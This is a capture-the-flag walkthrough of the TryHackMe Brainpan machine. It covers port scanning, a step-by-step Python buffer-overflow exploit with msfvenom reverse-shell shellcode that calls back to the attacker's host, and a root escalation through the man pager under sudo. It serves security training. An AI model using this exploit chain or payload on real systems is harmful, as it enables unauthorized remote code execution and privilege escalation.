Categories: Walkthrough
Tags: tryhackme, thm, BOF, BufferOverFlow, PrivEsc, PrivEsc-Linux, Man-PrivEsc, manual, man, Linux-Machine
$ nmap -p0-65535 -vvv 10.10.253.240 -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:56 IST
Initiating Ping Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Completed Ping Scan at 18:56, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:56
Completed Parallel DNS resolution of 1 host. at 18:56, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Discovered open port 10000/tcp on 10.10.253.240
Discovered open port 9999/tcp on 10.10.253.240
Completed Connect Scan at 18:56, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.253.240
Host is up, received conn-refused (0.16s latency).
Scanned at 2021-07-15 18:56:17 IST for 7s
PORT STATE SERVICE REASON
9999/tcp open abyss syn-ack
10000/tcp open snet-sensor-mgmt syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds
$ nmap -p9999,10000 -sV -sC 10.10.253.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:59 IST
Nmap scan report for 10.10.253.240
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.91%I=7%D=7/15%Time=60F0382F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|
SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\
SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x
SF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.96 seconds
From the scanning phase, we got the brainpan binary is running.
Lets check the logic of brainpan
$ nc -nv 10.10.253.240 9999
(UNKNOWN) [10.10.253.240] 9999 (?) open
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>> password
ACCESS DENIED
so once we get connected, will be greeted with banner and need to enter the password
Lets check web server
There is nothing much on the home page.
Lets fuzz for directories and files
$ ffuf -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.253.240:10000/FUZZ -ic -e .php,.html,.txt,.php3,.php5,php7
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.253.240:10000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .php3 .php5 php7
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 215, Words: 7, Lines: 9]
index.html [Status: 200, Size: 215, Words: 7, Lines: 9]
bin [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [1543829/1543829] :: Job [1/1] :: 172 req/sec :: Duration: [0:00:35] :: Errors: 0 ::
We have bin
directory, Lets navigate to it.
Download it and check the binary.
we got to know that its same binary running on port 9999
in target server
Lets fuzz for BOF
#!/usr/bin/env python3
import socket, time, sys
ip = "192.168.30.133"
port = 9999
timeout = 5
password = b"A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
# For receiving Banner
s.recv(2048)
print("Fuzzing with {} bytes".format(len(password)))
# sending password
s.send(password)
# For receiving Access Denied message
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(password)))
sys.exit(0)
password += b"A"*100
time.sleep(1)
$ ./fuzzy.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes
Testing for crash at Roughly 600
bytes
#!/usr/bin/env python3
import socket
import struct
ip = "192.168.30.133"
port = 9999
total_length = 600
payload = [
b"A"*total_length
]
payload = b"".join(payload)
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()
Finding the offset
msf-pattern_create -l 600
#!/usr/bin/env python3
import socket
ip = "192.168.30.133"
port = 9999
total_length = 600
offset = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(offset)
s.close()
$ msf-pattern_offset -l 600 -q 35724134
[*] Exact match at offset 524
we got the offset as 524
Verifying the offset
#!/usr/bin/env python3
import socket
ip = "192.168.30.133"
port = 9999
total_length = 600
offset=524
EIP=b"BBBB"
payload = [ b"A"*offset,
EIP,
b"C"*int(total_length-offset-len(EIP))
]
payload = b"".join(payload)
s = socket.socket()
s.connect( (ip, port))
s.recv(2048)
s.send(payload)
s.close()
Knowing the bad characters
!mona bytearray -b "\x00"
#!/usr/bin/env python3
import socket
ip = "192.168.30.133"
port = 9999
total_length = 600
offset = 524
EIP=b"BBBB"
allchars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
payload = [ b"A"*offset,
EIP,
allchars,
b"C"*int(total_length - offset - len(EIP) - len(allchars))
]
payload = b"".join(payload)
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()
!mona compare -f C:\Users\chandu\AppData\Local\VirtualStore\Program Files (x86)\Immunity Inc\Immunity Debugger\bytearray.bin -a 0028F930
From this we can know nullbyte is the only bad character
Knowing the Address for Jumping to ESP using EIP
!mona jmp -r esp -cpb "\x00"
We got the address 0x311712f3
Generating the payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.30.133 LPORT=9898 -b "\x00" -f py
Executing the script
#!/usr/bin/env python3
import socket
import struct
ip = "192.168.30.133"
port = 9999
total_length = 600
offset=524
NEW_EIP = struct.pack("<I", 0x311712f3)
nop_ramp = b"\x90" * 16
#EIP=b"BBBB"
buf = b""
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"
shellcode = buf
payload = [ b"A"*offset,
NEW_EIP,
nop_ramp,
shellcode,
b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]
payyload = b"".join(payload)
s=socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payyload)
s.close()
Getting the initial access
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=9898 -b "\x00" -f py --> target is linux machine
#!/usr/bin/env python3
import socket
import struct
ip = "192.168.30.133" -----------> target ip
port = 9999
total_length = 600
offset=524
NEW_EIP = struct.pack("<I", 0x311712f3)
nop_ramp = b"\x90" * 16
#EIP=b"BBBB"
buf = b"" -----------> modify this payload with the payload generated
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"
shellcode = buf
payload = [ b"A"*offset,
NEW_EIP,
nop_ramp,
shellcode,
b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]
payyload = b"".join(payload)
s=socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payyload)
s.close()
By modifying and running the script, we got initial access.
Spawning TTY
whoami
puck
date
Thu Jul 15 10:31:22 CDT 2021
python -c 'import pty; pty.spawn("/bin/bash")'
puck@brainpan:/home/puck$ ^Z
[1] + 10624 suspended nc -nlvp 9898
$ stty raw -echo; fg [1] + 10624 continued nc -nlvp 9898
puck@brainpan:/home/puck$ export TERM=xterm
puck@brainpan:/home/puck$ ls -l /home
total 12
drwx------ 4 anansi anansi 4096 Mar 4 2013 anansi
drwx------ 7 puck puck 4096 Mar 6 2013 puck
drwx------ 3 reynard reynard 4096 Mar 4 2013 reynard
puck@brainpan:/home/puck$ sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
link/ether 02:be:d5:89:ab:bf brd ff:ff:ff:ff:ff:ff
inet 10.10.253.240/16 brd 10.10.255.255 scope global eth0
inet6 fe80::be:d5ff:fe89:abbf/64 scope link
valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
top - 10:38:34 up 2:19, 0 users, load average: 0.00, 0.01, 0.03
Tasks: 72 total, 1 running, 71 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.1 us, 0.1 sy, 0.0 ni, 99.5 id, 0.2 wa, 0.0 hi, 0.0 si, 0.1 st
KiB Mem: 2064648 total, 135728 used, 1928920 free, 12600 buffers
KiB Swap: 520188 total, 0 used, 520188 free, 82156 cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 20 0 3500 1864 1280 S 0.0 0.1 0:00.73 init
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.22 ksoftirqd/0
5 root 20 0 0 0 0 S 0.0 0.0 0:00.21 kworker/u:0
6 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
7 root rt 0 0 0 0 S 0.0 0.0 0:00.03 watchdog/0
8 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 cpuset
9 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 khelper
10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kdevtmpfs
11 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 netns
12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
13 root 20 0 0 0 0 S 0.0 0.0 0:00.15 xenbus
14 root 20 0 0 0 0 S 0.0 0.0 0:00.01 sync_supers
15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
16 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kintegrityd
17 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kblockd
18 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 ata_sff
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ man manual
No manual entry for manual
puck@brainpan:/home/puck$
Using man
command to escalate privileges
sudo /home/anansi/bin/anansi_util manual man